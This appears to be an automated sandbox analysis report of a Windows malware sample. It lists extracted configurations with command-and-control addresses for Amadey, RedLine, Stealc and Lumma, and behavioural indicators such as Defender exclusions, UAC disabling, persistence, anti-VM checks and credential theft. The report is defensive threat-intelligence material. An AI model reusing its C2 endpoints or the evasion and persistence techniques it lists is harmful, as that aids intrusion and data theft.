Analysis
-
max time kernel
299s -
max time network
293s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
05/05/2024, 22:25 UTC
Static task
static1
Behavioral task
behavioral1
Sample
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
Resource
win10-20240404-en
General
-
Target
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe
-
Size
1.8MB
-
MD5
f5a33e2c9e2f68449a07778cc2edf846
-
SHA1
9b1c77c93fdf834a281da35fb3d5060d6de64de6
-
SHA256
2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203
-
SHA512
cacf32b567797196a636d17ab2457cbe1bbd25f339cef8bd46848abba8d0e60ebbb5937d378a3300c8c0f242743489ceb1909039ebcf9670cabaecf08afdb12e
-
SSDEEP
49152:kcvZBay16INgG3P2GHYTAIEj6G3KdbeuBJI4:ki1tC3KX66cR/I
Malware Config
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
redline
Test1234
185.215.113.67:26260
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
redline
@CLOUDYTTEAM
185.172.128.33:8970
Extracted
lumma
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
https://zippyfinickysofwps.shop/api
https://acceptabledcooeprs.shop/api
https://obsceneclassyjuwks.shop/api
Signatures
-
Detect ZGRat V1 4 IoCs
resource yara_rule behavioral2/memory/4872-239-0x0000000000400000-0x0000000000592000-memory.dmp family_zgrat_v1 behavioral2/files/0x000700000001abf3-247.dat family_zgrat_v1 behavioral2/memory/236-267-0x00000000006A0000-0x0000000000760000-memory.dmp family_zgrat_v1 behavioral2/memory/5568-2452-0x000002739D7A0000-0x00000273A1098000-memory.dmp family_zgrat_v1 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" smyDlk5Es9ywvt8vYzqP4xsg.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
resource yara_rule behavioral2/files/0x000800000001aba6-41.dat family_redline behavioral2/memory/3956-49-0x0000000000A20000-0x0000000000A72000-memory.dmp family_redline behavioral2/memory/4280-249-0x0000000000BF0000-0x0000000000C42000-memory.dmp family_redline behavioral2/files/0x000700000001abf2-248.dat family_redline behavioral2/files/0x000700000001abf3-247.dat family_redline behavioral2/memory/236-267-0x00000000006A0000-0x0000000000760000-memory.dmp family_redline -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\WNVWzyQ9U4x61stEDAP6lzkw.exe = "0" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ckl9TyIZXKdlKs1JCVsLffk7.exe = "0" Ckl9TyIZXKdlKs1JCVsLffk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3QQWENYHN4zHu7XvvsSKZTYq.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YYVxHJ2hAo7YMQ97pBCimtCf.exe = "0" YYVxHJ2hAo7YMQ97pBCimtCf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral2/files/0x000700000001ac02-405.dat family_xmrig behavioral2/files/0x000700000001ac02-405.dat xmrig -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ smyDlk5Es9ywvt8vYzqP4xsg.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 18 3956 jok.exe 171 2696 rundll32.exe 122 4296 rundll32.exe 122 4296 rundll32.exe 127 5688 rundll32.exe 127 5688 rundll32.exe 122 4296 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs
Run Powershell and hide display window.
pid Process 5580 powershell.exe 5212 powershell.exe 5208 powershell.EXE 5432 powershell.exe 5112 powershell.exe 1252 powershell.exe 1268 powershell.exe 6000 powershell.exe 5224 powershell.exe 5744 powershell.exe 5428 powershell.exe 2716 powershell.exe 5812 powershell.exe 5708 powershell.exe 724 powershell.exe 2556 powershell.exe 4208 powershell.exe 1628 powershell.exe 2448 powershell.exe 5820 powershell.exe 1044 powershell.exe 4488 powershell.exe 428 powershell.exe 5872 powershell.exe 1200 powershell.exe 2092 powershell.exe 3904 powershell.exe 5764 powershell.exe 5848 powershell.exe 5872 powershell.exe 6116 powershell.exe 4568 powershell.exe 6088 powershell.exe 4232 powershell.exe 2164 powershell.exe 3544 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 5 IoCs
pid Process 4188 netsh.exe 3904 netsh.exe 4476 netsh.exe 5636 netsh.exe 2692 netsh.exe -
Checks BIOS information in registry 2 TTPs 19 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion smyDlk5Es9ywvt8vYzqP4xsg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion smyDlk5Es9ywvt8vYzqP4xsg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation FhZPPvs.exe Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation CotgOgQ.exe -
Drops startup file 9 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bBRtpNfgmiXyk90SOu7jdxVQ.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\R3AJssgn42PsZGJfIPhYJzUY.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C4l2aZebimGIGhUFt0UPniVZ.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1XjlfxxoVzwfqMXpTdzAx628.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eDl7QnE43R2Ibz8zT4SK0Ewo.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\U7kGQmmC565krYEDHEEl2dXZ.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JffY3gQsg2oimfd4I3MT3QXS.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7JYlJEJ6x6NFSKxoCKFUt4KG.bat regsvcs.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qao1FFw1lSdDnoSzwLvTgTko.bat regsvcs.exe -
Executes dropped EXE 64 IoCs
pid Process 2992 explorha.exe 2712 swiiiii.exe 3956 jok.exe 1968 swiiii.exe 2316 file300un.exe 2796 gold.exe 2736 b1nbwn523WEOir6D5RHSIeEr.exe 2888 WNVWzyQ9U4x61stEDAP6lzkw.exe 2244 3QQWENYHN4zHu7XvvsSKZTYq.exe 3256 Ckl9TyIZXKdlKs1JCVsLffk7.exe 2420 YYVxHJ2hAo7YMQ97pBCimtCf.exe 4772 explorha.exe 2744 alexxxxxxxx.exe 4280 keks.exe 236 trf.exe 2552 install.exe 4560 GameService.exe 4116 GameService.exe 1628 GameService.exe 4652 GameService.exe 3828 GameService.exe 2708 GameSyncLink.exe 4728 GameService.exe 5100 GameService.exe 4304 GameService.exe 648 GameService.exe 4560 GameService.exe 504 PiercingNetLink.exe 596 GameService.exe 4368 GameService.exe 4232 GameService.exe 2464 GameService.exe 4412 GameSyncLinks.exe 4368 GameSyncLink.exe 4228 PiercingNetLink.exe 2564 GameSyncLinks.exe 360 GameSyncLink.exe 4352 PiercingNetLink.exe 4036 GameSyncLinks.exe 1784 smyDlk5Es9ywvt8vYzqP4xsg.exe 2592 NewB.exe 4904 ISetup8.exe 2796 PiercingNetLink.exe 3052 toolspub1.exe 4860 4767d2e713f2021e8fe856e3ea638b58.exe 4116 w5WMABIkihlCRso1g89r14TE.exe 5160 Install.exe 5756 GameSyncLinks.exe 5768 GameSyncLink.exe 1436 PiercingNetLink.exe 5780 Install.exe 5476 GameSyncLinks.exe 5216 GameSyncLink.exe 5656 EGijUa0yZwO1E3ULKTt8Y0Pe.exe 5728 Install.exe 5864 explorha.exe 5540 NewB.exe 1392 Install.exe 5176 CotgOgQ.exe 5788 FhZPPvs.exe 5572 PiercingNetLink.exe 3824 GameSyncLinks.exe 5388 GameSyncLink.exe 4960 u240.0.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine 2219fa1e23dac10134da6a6be9d6634a250dc2fc4cfdac1ad48d6e41c9406203.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Wine explorha.exe -
Loads dropped DLL 6 IoCs
pid Process 3056 rundll32.exe 2696 rundll32.exe 4296 rundll32.exe 5688 rundll32.exe 4960 u240.0.exe 4960 u240.0.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/1784-442-0x0000000140000000-0x0000000140861000-memory.dmp themida behavioral2/memory/1784-504-0x0000000140000000-0x0000000140861000-memory.dmp themida behavioral2/memory/1784-576-0x0000000140000000-0x0000000140861000-memory.dmp themida -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Ckl9TyIZXKdlKs1JCVsLffk7.exe = "0" Ckl9TyIZXKdlKs1JCVsLffk7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\YYVxHJ2hAo7YMQ97pBCimtCf.exe = "0" YYVxHJ2hAo7YMQ97pBCimtCf.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3QQWENYHN4zHu7XvvsSKZTYq.exe = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\WNVWzyQ9U4x61stEDAP6lzkw.exe = "0" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 3QQWENYHN4zHu7XvvsSKZTYq.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 3QQWENYHN4zHu7XvvsSKZTYq.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" WNVWzyQ9U4x61stEDAP6lzkw.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" Ckl9TyIZXKdlKs1JCVsLffk7.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" YYVxHJ2hAo7YMQ97pBCimtCf.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA smyDlk5Es9ywvt8vYzqP4xsg.exe -
Drops Chrome extension 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json FhZPPvs.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json CotgOgQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json FhZPPvs.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json CotgOgQ.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 38 pastebin.com 37 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ipinfo.io -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 63 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI smyDlk5Es9ywvt8vYzqP4xsg.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA CotgOgQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CotgOgQ.exe File opened for modification C:\Windows\System32\GroupPolicy smyDlk5Es9ywvt8vYzqP4xsg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CotgOgQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 CotgOgQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FhZPPvs.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 CotgOgQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CotgOgQ.exe File opened for modification 